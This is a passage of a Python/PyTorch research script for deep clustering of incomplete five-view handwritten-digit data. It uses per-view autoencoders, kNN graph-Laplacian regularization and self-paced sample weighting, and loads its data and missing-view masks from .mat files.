MinMaxScaler,normalize\r\nimport scipy.io\r\n#from utils import MnistDataset, cluster_acc,load_mnist\r\nfrom idecutils import cluster_acc\r\nimport idecutils\r\nimport h5py\r\nimport csv\r\nfrom sklearn import manifold, datasets\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\nimport random\r\n#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"7\" \r\ndef wmse_loss(input, target, weight, reduction='mean'):\r\n    ret = (torch.diag(weight).mm(target - 
input)) ** 2\r\n ret = torch.mean(ret)\r\n return ret\r\ndef get_kNNgraph2(data,K_num):\r\n # each row of data is a sample\r\n \r\n x_norm = np.reshape(np.sum(np.square(data), 1), [-1, 1]) # column vector\r\n x_norm2 = np.reshape(np.sum(np.square(data), 1), [1, -1]) # column vector\r\n dists = x_norm - 2 * np.matmul(data, np.transpose(data))+x_norm2\r\n num_sample = data.shape[0]\r\n graph = np.zeros((num_sample,num_sample),dtype = np.int)\r\n for i in range(num_sample):\r\n distance = dists[i,:]\r\n small_index = np.argsort(distance)\r\n graph[i,small_index[0:K_num]] = 1\r\n graph = graph-np.diag(np.diag(graph))\r\n resultgraph = np.maximum(graph,np.transpose(graph))\r\n return resultgraph\r\nclass AE(nn.Module):\r\n\r\n def __init__(self, n_stacks,n_input, n_z):\r\n super(AE, self).__init__()\r\n dims0 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[0]*0.8)\r\n linshidim = int(linshidim)\r\n dims0.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims0.append(linshidim)\r\n \r\n dims1 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[1]*0.8)\r\n linshidim = int(linshidim)\r\n dims1.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims1.append(linshidim) \r\n \r\n dims2 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[2]*0.8)\r\n linshidim = int(linshidim)\r\n dims2.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims2.append(linshidim) \r\n \r\n dims3 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[3]*0.8)\r\n linshidim = int(linshidim)\r\n dims3.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims3.append(linshidim)\r\n \r\n dims4 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[4]*0.8)\r\n linshidim = int(linshidim)\r\n dims4.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims4.append(linshidim)\r\n \r\n # encoder0\r\n self.enc0_1 = Linear(n_input[0], dims0[0])\r\n self.enc0_2 = Linear(dims0[0], dims0[1])\r\n self.enc0_3 = Linear(dims0[1], dims0[2])\r\n self.z0_layer = Linear(dims0[2], n_z)\r\n # encoder1\r\n self.enc1_1 = Linear(n_input[1], dims1[0])\r\n self.enc1_2 = Linear(dims1[0], dims1[1])\r\n self.enc1_3 = Linear(dims1[1], dims1[2])\r\n self.z1_layer = Linear(dims1[2], n_z)\r\n # encoder2\r\n self.enc2_1 = Linear(n_input[2], dims2[0])\r\n self.enc2_2 = Linear(dims2[0], dims2[1])\r\n self.enc2_3 = Linear(dims2[1], dims2[2])\r\n self.z2_layer = Linear(dims2[2], n_z)\r\n # encoder3\r\n self.enc3_1 = Linear(n_input[3], dims3[0])\r\n self.enc3_2 = Linear(dims3[0], dims3[1])\r\n self.enc3_3 = Linear(dims3[1], dims3[2])\r\n self.z3_layer = Linear(dims3[2], n_z) \r\n # encoder4\r\n self.enc4_1 = Linear(n_input[4], dims4[0])\r\n self.enc4_2 = Linear(dims4[0], dims4[1])\r\n self.enc4_3 = Linear(dims4[1], dims4[2])\r\n self.z4_layer = Linear(dims4[2], n_z) \r\n \r\n \r\n # decoder0\r\n self.dec0_0 = Linear(n_z, n_z)\r\n self.dec0_1 = Linear(n_z, dims0[2])\r\n self.dec0_2 = Linear(dims0[2], dims0[1])\r\n self.dec0_3 = Linear(dims0[1], dims0[0])\r\n self.x0_bar_layer = Linear(dims0[0], n_input[0])\r\n # decoder1\r\n self.dec1_0 = Linear(n_z, n_z) \r\n self.dec1_1 = Linear(n_z, dims1[2])\r\n self.dec1_2 = Linear(dims1[2], dims1[1])\r\n self.dec1_3 = Linear(dims1[1], dims1[0])\r\n self.x1_bar_layer = Linear(dims1[0], n_input[1])\r\n # decoder2\r\n self.dec2_0 = Linear(n_z, n_z) \r\n self.dec2_1 = Linear(n_z, dims2[2])\r\n self.dec2_2 = Linear(dims2[2], dims2[1])\r\n 
self.dec2_3 = Linear(dims2[1], dims2[0])\r\n self.x2_bar_layer = Linear(dims2[0], n_input[2]) \r\n # decoder3\r\n self.dec3_0 = Linear(n_z, n_z) \r\n self.dec3_1 = Linear(n_z, dims3[2])\r\n self.dec3_2 = Linear(dims3[2], dims3[1])\r\n self.dec3_3 = Linear(dims3[1], dims3[0])\r\n self.x3_bar_layer = Linear(dims3[0], n_input[3])\r\n # decoder4\r\n self.dec4_0 = Linear(n_z, n_z) \r\n self.dec4_1 = Linear(n_z, dims4[2])\r\n self.dec4_2 = Linear(dims4[2], dims4[1])\r\n self.dec4_3 = Linear(dims4[1], dims4[0])\r\n self.x4_bar_layer = Linear(dims4[0], n_input[4]) \r\n \r\n def forward(self, x0,x1,x2,x3,x4,we):\r\n # encoder0\r\n enc0_h1 = F.relu(self.enc0_1(x0))\r\n enc0_h2 = F.relu(self.enc0_2(enc0_h1))\r\n enc0_h3 = F.relu(self.enc0_3(enc0_h2))\r\n z0 = self.z0_layer(enc0_h3) \r\n # encoder1\r\n enc1_h1 = F.relu(self.enc1_1(x1))\r\n enc1_h2 = F.relu(self.enc1_2(enc1_h1))\r\n enc1_h3 = F.relu(self.enc1_3(enc1_h2))\r\n z1 = self.z1_layer(enc1_h3) \r\n # encoder2\r\n enc2_h1 = F.relu(self.enc2_1(x2))\r\n enc2_h2 = F.relu(self.enc2_2(enc2_h1))\r\n enc2_h3 = F.relu(self.enc2_3(enc2_h2))\r\n z2 = self.z2_layer(enc2_h3) \r\n # encoder3\r\n enc3_h1 = F.relu(self.enc3_1(x3))\r\n enc3_h2 = F.relu(self.enc3_2(enc3_h1))\r\n enc3_h3 = F.relu(self.enc3_3(enc3_h2)) \r\n z3 = self.z3_layer(enc3_h3) \r\n # encoder4\r\n enc4_h1 = F.relu(self.enc4_1(x4))\r\n enc4_h2 = F.relu(self.enc4_2(enc4_h1))\r\n enc4_h3 = F.relu(self.enc4_3(enc4_h2)) \r\n z4 = self.z4_layer(enc4_h3) \r\n \r\n summ = torch.diag(we[:,0]).mm(z0)+torch.diag(we[:,1]).mm(z1)+torch.diag(we[:,2]).mm(z2)+torch.diag(we[:,3]).mm(z3)+torch.diag(we[:,4]).mm(z4) \r\n wei = 1/torch.sum(we,1)\r\n z = torch.diag(wei).mm(summ)\r\n \r\n # decoder0\r\n r0 = F.relu(self.dec0_0(z))\r\n dec0_h1 = F.relu(self.dec0_1(r0))\r\n dec0_h2 = F.relu(self.dec0_2(dec0_h1))\r\n dec0_h3 = F.relu(self.dec0_3(dec0_h2))\r\n x0_bar = self.x0_bar_layer(dec0_h3)\r\n # decoder1\r\n r1 = F.relu(self.dec1_0(z)) \r\n dec1_h1 = F.relu(self.dec1_1(r1))\r\n dec1_h2 = F.relu(self.dec1_2(dec1_h1))\r\n dec1_h3 = F.relu(self.dec1_3(dec1_h2))\r\n x1_bar = self.x1_bar_layer(dec1_h3)\r\n # decoder2\r\n r2 = F.relu(self.dec2_0(z))\r\n dec2_h1 = F.relu(self.dec2_1(r2))\r\n dec2_h2 = F.relu(self.dec2_2(dec2_h1))\r\n dec2_h3 = F.relu(self.dec2_3(dec2_h2))\r\n x2_bar = self.x2_bar_layer(dec2_h3) \r\n # decoder3\r\n r3 = F.relu(self.dec3_0(z))\r\n dec3_h1 = F.relu(self.dec3_1(r3))\r\n dec3_h2 = F.relu(self.dec3_2(dec3_h1))\r\n dec3_h3 = F.relu(self.dec3_3(dec3_h2))\r\n x3_bar = self.x3_bar_layer(dec3_h3) \r\n # decoder4\r\n r4 = F.relu(self.dec4_0(z))\r\n dec4_h1 = F.relu(self.dec4_1(r4))\r\n dec4_h2 = F.relu(self.dec4_2(dec4_h1))\r\n dec4_h3 = F.relu(self.dec4_3(dec4_h2))\r\n x4_bar = self.x4_bar_layer(dec4_h3) \r\n \r\n return x0_bar,x1_bar,x2_bar,x3_bar,x4_bar,z,z0,z1,z2,z3,z4\r\n\r\n\r\nclass IDEC(nn.Module):\r\n\r\n def __init__(self,\r\n n_stacks,\r\n n_input,\r\n n_z,\r\n n_clusters,\r\n pretrain_path='data/ae_handwritten-5view.pkl'):\r\n super(IDEC, self).__init__()\r\n self.pretrain_path = pretrain_path\r\n\r\n self.ae = AE(\r\n n_stacks=n_stacks,\r\n n_input=n_input,\r\n n_z=n_z)\r\n\r\n def pretrain(self, path=''):\r\n if args.pretrain_flag == 0:\r\n pretrain_ae(self.ae)\r\n print('pretrained ae finished')\r\n args.pretrain_flag = 1\r\n else:\r\n self.ae.load_state_dict(torch.load(self.pretrain_path))\r\n print('load pretrained ae model from',self.pretrain_path) \r\n \r\n def update_label(self,x0,x1,x2,x3,x4,we,cluster_layer):\r\n _,_,_,_,_, z,_,_,_,_,_ = self.ae(x0,x1,x2,x3,x4,we)\r\n # 
kmeans cluster \r\n        x_norm = torch.reshape(torch.sum(torch.pow(z,2), 1), [-1, 1]) # column vector\r\n        center_norm = torch.reshape(torch.sum(torch.pow(cluster_layer,2), 1), [1, -1]) # row vector\r\n        dists = x_norm - 2 * torch.mm(z, torch.t(cluster_layer.type_as(z))) + center_norm.type_as(z) # |x-y|^2 = |x|^2 -2*x*y^T + |y|^2\r\n        labels = torch.argmin(dists, 1)\r\n        losses = torch.min(dists, 1)\r\n        return labels, losses.values\r\n    def forward(self,x0,x1,x2,x3,x4,we,ypred,cluster_layer,sp_weight_sub):\r\n        _,_,_,_,_, z,vz0,vz1,vz2,vz3,vz4 = self.ae(x0,x1,x2,x3,x4,we) \r\n        klloss = torch.mean(torch.diag(sp_weight_sub).mm(torch.pow(z-cluster_layer[ypred.cpu().numpy().tolist()].type_as(z),2)))\r\n        klloss = klloss*len(sp_weight_sub)/sum(sp_weight_sub)\r\n        return z,klloss,vz0,vz1,vz2,vz3,vz4\r\n\r\n\r\ndef pretrain_ae(model):\r\n    '''\r\n    pretrain autoencoder\r\n    '''\r\n    print(model)\r\n    for m in model.modules():\r\n        if isinstance(m, nn.Linear):\r\n            nn.init.xavier_uniform_(m.weight)\r\n            nn.init.constant_(m.bias, 0.0) \r\n\r\n    optimizer = SGD(model.parameters(), lr=args.lrae, momentum=args.momentumae)\r\n# model.train()\r\n    index_array = np.arange(X0.shape[0])\r\n    if args.AE_shuffle==True:\r\n        np.random.shuffle(index_array)\r\n    for epoch in range(args.aeproches): \r\n        total_loss = 0.\r\n        for batch_idx in range(int(np.ceil(X0.shape[0]/args.batch_size))):\r\n            idx = index_array[batch_idx * args.batch_size: min((batch_idx+1) * args.batch_size, X0.shape[0])] \r\n            x0 = X0[idx].to(device)\r\n            x1 = X1[idx].to(device)\r\n            x2 = X2[idx].to(device)\r\n            x3 = X3[idx].to(device)\r\n            x4 = X4[idx].to(device)\r\n            we = WE[idx].to(device)\r\n            affi_graph0 = torch.Tensor(np.copy(pre_affi_graph0[idx,:][:,idx])).to(device) \r\n            affi_graph1 = torch.Tensor(np.copy(pre_affi_graph1[idx,:][:,idx])).to(device) \r\n            affi_graph2 = torch.Tensor(np.copy(pre_affi_graph2[idx,:][:,idx])).to(device) \r\n            affi_graph3 = torch.Tensor(np.copy(pre_affi_graph3[idx,:][:,idx])).to(device)\r\n            affi_graph4 = torch.Tensor(np.copy(pre_affi_graph4[idx,:][:,idx])).to(device)\r\n            \r\n            affi_graph0 = 0.5*(affi_graph0+affi_graph0.t())\r\n            Lap_graph0 = torch.diag(affi_graph0.sum(1))-affi_graph0\r\n            affi_graph1 = 0.5*(affi_graph1+affi_graph1.t())\r\n            Lap_graph1 = torch.diag(affi_graph1.sum(1))-affi_graph1 \r\n            affi_graph2 = 0.5*(affi_graph2+affi_graph2.t())\r\n            Lap_graph2 = torch.diag(affi_graph2.sum(1))-affi_graph2\r\n            affi_graph3 = 0.5*(affi_graph3+affi_graph3.t())\r\n            Lap_graph3 = torch.diag(affi_graph3.sum(1))-affi_graph3\r\n            affi_graph4 = 0.5*(affi_graph4+affi_graph4.t())\r\n            Lap_graph4 = torch.diag(affi_graph4.sum(1))-affi_graph4\r\n            \r\n            optimizer.zero_grad()\r\n            x0_bar,x1_bar,x2_bar,x3_bar,x4_bar,hidden,vz0,vz1,vz2,vz3,vz4 = model(x0,x1,x2,x3,x4,we)\r\n            graph_loss = (1/5)*(torch.trace(vz0.t().mm(Lap_graph0).mm(vz0))+torch.trace(vz1.t().mm(Lap_graph1).mm(vz1))+torch.trace(vz2.t().mm(Lap_graph2).mm(vz2))+torch.trace(vz3.t().mm(Lap_graph3).mm(vz3))+torch.trace(vz4.t().mm(Lap_graph4).mm(vz4)))/len(idx)\r\n            loss = wmse_loss(x0_bar,x0,we[:,0])+wmse_loss(x1_bar,x1,we[:,1])+wmse_loss(x2_bar,x2,we[:,2])+wmse_loss(x3_bar,x3,we[:,3])+wmse_loss(x4_bar,x4,we[:,4])\r\n            fusion_loss = loss+args.gammaae*graph_loss\r\n            total_loss += fusion_loss.item()\r\n            fusion_loss.backward()\r\n            optimizer.step()\r\n        print(\"ae_epoch {} loss={:.8f} \".format(epoch,\r\n            total_loss / (batch_idx + 1)))\r\n    torch.save(model.state_dict(), args.pretrain_path)\r\n    print(\"model saved to {}.\".format(args.pretrain_path))\r\n\r\n\r\ndef train_idec():\r\n    \r\n    model = IDEC(\r\n        n_stacks = 
4, \r\n        n_input=args.n_input,\r\n        n_z = args.n_clusters,\r\n        n_clusters=args.n_clusters,\r\n        pretrain_path=args.pretrain_path).to(device)\r\n    for m in model.modules():\r\n        if isinstance(m, nn.Linear):\r\n            nn.init.xavier_uniform_(m.weight)\r\n            nn.init.constant_(m.bias, 0.0) \r\n    \r\n    model.pretrain()\r\n    optimizer = Adam(model.parameters(), lr=args.lrkl)\r\n    # cluster parameter initiate\r\n    _,_,_,_,_,hidden,_,_,_,_,_ = model.ae(X0,X1,X2,X3,X4,WE)\r\n    kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)\r\n# y_pred = kmeans.fit_predict(hidden.data.cpu().numpy())\r\n    hidden_np = hidden.data.cpu().numpy()\r\n    hidden_np = np.nan_to_num(hidden_np)\r\n    y_pred = kmeans.fit_predict(hidden_np)\r\n    del hidden_np\r\n    nmi_k = nmi_score(y_pred, y)\r\n    print(\"nmi score={:.4f}\".format(nmi_k))\r\n\r\n    hidden = None\r\n    y_pred_last = np.copy(y_pred)\r\n    cluster_layer = torch.tensor(kmeans.cluster_centers_).to(device)\r\n\r\n# model.train()\r\n    best_acc2 = 0\r\n    best_epoch = 0\r\n    total_loss_KL = 0\r\n    \r\n    sample_weight = torch.ones(X0.shape[0])\r\n    sample_weight[y_pred == -1] = 0 # do not use the noisy examples \r\n    clustering_loss = 0\r\n    for epoch in range(int(args.maxiter)):\r\n        if epoch > 0:\r\n            y_pred = y_pred.cpu().numpy()\r\n            acc = cluster_acc(y, y_pred)\r\n            nmi = nmi_score(y, y_pred)\r\n            ari = ari_score(y, y_pred)\r\n            if acc>best_acc2:\r\n                best_acc2 = np.copy(acc)\r\n                best_epoch = epoch\r\n            print('best_Iter {}'.format(best_epoch), ':best_Acc2 {:.4f}'.format(best_acc2),'Iter {}'.format(epoch),':Acc {:.4f}'.format(acc),\r\n                  ', nmi {:.4f}'.format(nmi), ', ari {:.4f}'.format(ari),'total_loss_KL {:.8f}'.format(clustering_loss))\r\n\r\n            # check stop criterion\r\n            delta_y = np.sum(y_pred != y_pred_last).astype(np.float32) / y_pred.shape[0]\r\n            y_pred_last = np.copy(y_pred)\r\n            if epoch > 80 and delta_y < args.tol:\r\n                print('Training stopped: epoch=%d, delta_label=%.4f, tol=%.4f' % (epoch, delta_y, args.tol))\r\n                break\r\n            y_pred = torch.tensor(y_pred)\r\n        \"\"\" Step 1: train the network \"\"\"\r\n        index_array = np.arange(X0.shape[0])\r\n        if args.AE_shuffle==True:\r\n            np.random.shuffle(index_array) \r\n        for KL_epoach in range(args.maxKL_epoach):\r\n            total_loss_KL = 0 \r\n            for batch_idx in range(int(np.ceil(X0.shape[0]/args.batch_size))):\r\n                idx = index_array[batch_idx * args.batch_size: min((batch_idx+1) * args.batch_size,X0.shape[0])] \r\n                x0 = X0[idx].to(device)\r\n                x1 = X1[idx].to(device)\r\n                x2 = X2[idx].to(device)\r\n                x3 = X3[idx].to(device)\r\n                x4 = X4[idx].to(device)\r\n                we = WE[idx].to(device)\r\n                y_pred_sub = y_pred[idx].to(device)\r\n                sample_weight_sub = sample_weight[idx].to(device)\r\n                affi_graph0 = torch.Tensor(np.copy(pre_affi_graph0[idx,:][:,idx])).to(device) \r\n                affi_graph1 = torch.Tensor(np.copy(pre_affi_graph1[idx,:][:,idx])).to(device) \r\n                affi_graph2 = torch.Tensor(np.copy(pre_affi_graph2[idx,:][:,idx])).to(device) \r\n                affi_graph3 = torch.Tensor(np.copy(pre_affi_graph3[idx,:][:,idx])).to(device)\r\n                affi_graph4 = torch.Tensor(np.copy(pre_affi_graph4[idx,:][:,idx])).to(device)\r\n                affi_graph0 = 0.5*(affi_graph0+affi_graph0.t())\r\n                Lap_graph0 = torch.diag(affi_graph0.sum(1))-affi_graph0\r\n                affi_graph1 = 0.5*(affi_graph1+affi_graph1.t())\r\n                Lap_graph1 = torch.diag(affi_graph1.sum(1))-affi_graph1 \r\n                affi_graph2 = 0.5*(affi_graph2+affi_graph2.t())\r\n                Lap_graph2 = torch.diag(affi_graph2.sum(1))-affi_graph2\r\n                affi_graph3 = 0.5*(affi_graph3+affi_graph3.t())\r\n                Lap_graph3 = torch.diag(affi_graph3.sum(1))-affi_graph3\r\n                affi_graph4 = 0.5*(affi_graph4+affi_graph4.t())\r\n                
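# unnormalized graph Laplacian: L = D - A of the symmetrized kNN affinity graph\r\n                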
Lap_graph4 = torch.diag(affi_graph4.sum(1))-affi_graph4 \r\n \r\n optimizer.zero_grad()\r\n hidden,kl_loss,vz0,vz1,vz2,vz3,vz4 = model(x0,x1,x2,x3,x4,we,y_pred_sub,cluster_layer,sample_weight_sub) \r\n if np.isnan(hidden.data.cpu().numpy()).any():\r\n break \r\n graph_loss = (1/5)*(torch.trace(vz0.t().mm(Lap_graph0).mm(vz0))+torch.trace(vz1.t().mm(Lap_graph1).mm(vz1))+torch.trace(vz2.t().mm(Lap_graph2).mm(vz2))+torch.trace(vz3.t().mm(Lap_graph3).mm(vz3))+torch.trace(vz4.t().mm(Lap_graph4).mm(vz4)))/len(idx)\r\n fusion_loss = kl_loss+args.gammakl*graph_loss \r\n total_loss_KL +=fusion_loss \r\n fusion_loss.backward()\r\n optimizer.step()\r\n if np.isnan(hidden.data.cpu().numpy()).any():\r\n total_loss_KL=0\r\n break\r\n else:\r\n total_loss_KL = total_loss_KL.item() / (batch_idx + 1)\r\n \r\n \"\"\" Step 2: update labels \"\"\"\r\n y_pred, prelosses = model.update_label(X0,X1,X2,X3,X4,WE,cluster_layer) \r\n \r\n clustering_loss = torch.sum(prelosses)/len(prelosses)\r\n \"\"\" Step 3: Compute sample weights \"\"\"\r\n lam = clustering_loss + epoch*torch.std(prelosses) / args.maxiter\r\n sample_weight = torch.where(prelosses < lam, torch.full_like(prelosses,1), torch.full_like(prelosses,0))\r\n \r\n \r\n y_pred,_ = model.update_label(X0,X1,X2,X3,X4,WE,cluster_layer)\r\n y_pred = y_pred.cpu().numpy()\r\n return y_pred \r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser(\r\n description='train',\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n \r\n parser.add_argument('--n_clusters', default=7, type=int)\r\n parser.add_argument('--batch_size', default=128, type=int)\r\n parser.add_argument('--n_z', default=10, type=int)\r\n parser.add_argument('--dataset', type=str, default='handwritten-5view')\r\n parser.add_argument('--basis_pretrain_path', type=str, default='data/handwritten-5view')\r\n parser.add_argument('--percentDel', type=int, default=3)\r\n parser.add_argument('--AE_shuffle', type=bool, default=False) \r\n parser.add_argument('--tol', default=1e-7, type=float)\r\n parser.add_argument('--basis_save_dir', type=str, default='data/handwritten-5view')\r\n acc_ite = np.zeros(5)\r\n nmi_ite = np.zeros(5)\r\n ari_ite = np.zeros(5)\r\n pur_ite = np.zeros(5)\r\n pre_ite = np.zeros(5)\r\n rec_ite = np.zeros(5)\r\n Fscore_ite = np.zeros(5)\r\n args = parser.parse_args()\r\n\r\n\r\n ff = 2\r\n args.save_dir = args.basis_save_dir+'_0_'+str(args.percentDel)+'_ff_'+str(ff)\r\n best_acc = 0\r\n best_nmi = 0\r\n \r\n args.cuda = torch.cuda.is_available()\r\n print(\"use cuda: {}\".format(args.cuda))\r\n device = torch.device(\"cuda\" if args.cuda else \"cpu\") \r\n data = scipy.io.loadmat('data/'+args.dataset+'.mat')\r\n foldss = scipy.io.loadmat('data/'+args.dataset+'_percentDel_0.'+str(args.percentDel)+'.mat') \r\n label = data['Y']\r\n label = label.reshape(-1)\r\n label = np.array(label,'float64')\r\n X = data['X']\r\n args.n_clusters = len(np.unique(label))\r\n y = label\r\n del label,data\r\n folds = foldss['folds']\r\n WE = folds[0,ff]\r\n del folds\r\n \r\n X0 = np.array(X[0,0],'float64') #240 76 216 47 64 features~\r\n X1 = np.array(X[0,1],'float64')\r\n X2 = np.array(X[0,2],'float64')\r\n X3 = np.array(X[0,3],'float64')\r\n X4 = np.array(X[0,4],'float64') \r\n del X\r\n \r\n iv = 0\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN0 = np.copy(X0) \r\n linshi_XN0[ind_0,:] = np.mean(linshi_XN0[ind_1,:],axis=0)\r\n 
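# the mean-imputed copy (linshi_XN0) is L2-normalized and later used to build the kNN affinity graph\r\n    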
linshi_XN0 = normalize(linshi_XN0) \r\n X0[ind_1,:] = StandardScaler().fit_transform(X0[ind_1,:])\r\n X0[ind_0,:] = 0\r\n \r\n iv = 1\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN1 = np.copy(X1) \r\n linshi_XN1[ind_0,:] = np.mean(linshi_XN1[ind_1,:],axis=0)\r\n linshi_XN1 = normalize(linshi_XN1) \r\n X1[ind_1,:] = StandardScaler().fit_transform(X1[ind_1,:])\r\n X1[ind_0,:] = 0\r\n \r\n iv=2\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN2 = np.copy(X2) \r\n linshi_XN2[ind_0,:] = np.mean(linshi_XN2[ind_1,:],axis=0)\r\n linshi_XN2 = normalize(linshi_XN2) \r\n X2[ind_1,:] = StandardScaler().fit_transform(X2[ind_1,:])\r\n X2[ind_0,:] = 0\r\n \r\n iv=3\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1) \r\n linshi_XN3 = np.copy(X3) \r\n linshi_XN3[ind_0,:] = np.mean(linshi_XN3[ind_1,:],axis=0)\r\n linshi_XN3 = normalize(linshi_XN3) \r\n X3[ind_1,:] = StandardScaler().fit_transform(X3[ind_1,:])\r\n X3[ind_0,:] = 0\r\n \r\n iv=4\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1) \r\n linshi_XN4 = np.copy(X4) \r\n linshi_XN4[ind_0,:] = np.mean(linshi_XN4[ind_1,:],axis=0)\r\n linshi_XN4 = normalize(linshi_XN4) \r\n X4[ind_1,:] = StandardScaler().fit_transform(X4[ind_1,:])\r\n X4[ind_0,:] = 0 \r\n del iv,ind_1,ind_0,WEiv\r\n \r\n X0 = np.nan_to_num(X0)\r\n X1 = np.nan_to_num(X1)\r\n X2 = np.nan_to_num(X2)\r\n X3 = np.nan_to_num(X3)\r\n X4 = np.nan_to_num(X4)\r\n \r\n X_total = np.concatenate((linshi_XN0,linshi_XN1,linshi_XN2,linshi_XN3,linshi_XN4),axis=1)\r\n np.random.seed(20)\r\n kmeans = KMeans(n_clusters=args.n_clusters, n_init=20,random_state=20)\r\n \r\n\r\n# kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)\r\n y_pred = kmeans.fit_predict(X_total) \r\n del X_total,kmeans\r\n \r\n \r\n X0_train = np.zeros(X0.shape)\r\n X1_train = np.zeros(X1.shape)\r\n X2_train = np.zeros(X2.shape)\r\n X3_train = np.zeros(X3.shape)\r\n X4_train = np.zeros(X4.shape)\r\n\r\n \r\n linshi_XN0_train = np.zeros(X0.shape)\r\n linshi_XN1_train = np.zeros(X1.shape)\r\n linshi_XN2_train = np.zeros(X2.shape)\r\n linshi_XN3_train = np.zeros(X3.shape)\r\n linshi_XN4_train = np.zeros(X4.shape)\r\n\r\n \r\n label_train = np.zeros(y.shape)\r\n WE_train = np.zeros(WE.shape)\r\n basis_index = 0\r\n for li in range(args.n_clusters):\r\n index_li = np.where(y_pred==li)\r\n index_li = (np.array(index_li)).reshape(-1)\r\n X0_train[np.arange(len(index_li))+basis_index,:] = np.copy(X0[index_li])\r\n X1_train[np.arange(len(index_li))+basis_index,:] = np.copy(X1[index_li])\r\n X2_train[np.arange(len(index_li))+basis_index,:] = np.copy(X2[index_li])\r\n X3_train[np.arange(len(index_li))+basis_index,:] = np.copy(X3[index_li])\r\n X4_train[np.arange(len(index_li))+basis_index,:] = np.copy(X4[index_li])\r\n \r\n label_train[np.arange(len(index_li))+basis_index] = np.copy(y[index_li])\r\n WE_train[np.arange(len(index_li))+basis_index,:] = np.copy(WE[index_li,:])\r\n linshi_XN0_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN0[index_li])\r\n linshi_XN1_train[np.arange(len(index_li))+basis_index,:] = 
np.copy(linshi_XN1[index_li])\r\n linshi_XN2_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN2[index_li])\r\n linshi_XN3_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN3[index_li])\r\n linshi_XN4_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN4[index_li])\r\n basis_index = basis_index + len(index_li)\r\n \r\n del X0,X1,X2,X3,X4,WE,y,linshi_XN0,linshi_XN1,linshi_XN2,linshi_XN3,linshi_XN4\r\n X0 = np.copy(X0_train)\r\n X1 = np.copy(X1_train)\r\n X2 = np.copy(X2_train)\r\n X3 = np.copy(X3_train)\r\n X4 = np.copy(X4_train)\r\n \r\n WE = np.copy(WE_train)\r\n y = label_train\r\n del X0_train,X1_train,X2_train,X3_train,X4_train,WE_train,label_train,basis_index,index_li \r\n \r\n \r\n iv = 0\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN0_train[ind_1,:]) \r\n pre_affi_graph0 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph0 = np.matmul(np.matmul(index_matrix,pre_affi_graph0),np.transpose(index_matrix))\r\n\r\n iv = 1\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN1_train[ind_1,:]) \r\n pre_affi_graph1 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph1 = np.matmul(np.matmul(index_matrix,pre_affi_graph1),np.transpose(index_matrix))\r\n \r\n iv=2\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN2_train[ind_1,:]) \r\n pre_affi_graph2 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph2 = np.matmul(np.matmul(index_matrix,pre_affi_graph2),np.transpose(index_matrix)) \r\n\r\n iv = 3\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = 